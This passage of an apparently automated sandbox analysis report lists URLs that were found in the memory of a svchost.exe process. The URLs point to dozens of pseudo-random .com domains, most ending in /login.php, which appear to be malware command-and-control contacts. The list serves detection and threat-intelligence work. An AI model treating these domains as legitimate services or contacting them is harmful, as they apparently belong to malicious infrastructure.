Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043884959.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069506631.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053087644.00000000029CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygok.com/login.php
Source: svchost.exe, 00000002.00000003.1793087663.000000000662E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790880337.000000000662C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygut.com/http://gahyfyz.com/http://vopycom.com/http://lyvywed.com/http://vopycom.com/http:
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029740954.000000000B4C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyjyc.com/login.php
Source: svchost.exe, 00000002.00000003.2491008022.00000000066A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojykyf.com/H
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojykyf.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojypuc.com/login.php
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029740954.000000000B4C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyquf.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyrak.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088268676.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088372788.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2464940271.00000000066A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090604412.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyrum.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391866145.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyzyt.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybut.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volycem.com/
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydot.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydyk.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602500488.00000000066BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575876726.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2603102836.000000000673B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123555965.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576944755.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2585483183.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyt.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055822668.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjym.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykit.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473737511.0000000006676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypum.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360289865.000000000673E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2510214419.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360701131.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1415492981.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyqat.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036084916.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyquk.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyquk.com/login.phpa4
Source: svchost.exe, 00000002.00000003.2023171652.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021041342.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2016992308.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036974301.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019866036.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499203809.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzic.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybat.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2083352606.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjef.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjim.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339528056.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356165238.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349329564.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyket.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonykuk.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqok.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqym.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357632057.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360289865.000000000673E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364803259.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360701131.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1415492981.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151201367.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364340115.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzuf.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793360892.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycom.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjuf.com/login.php
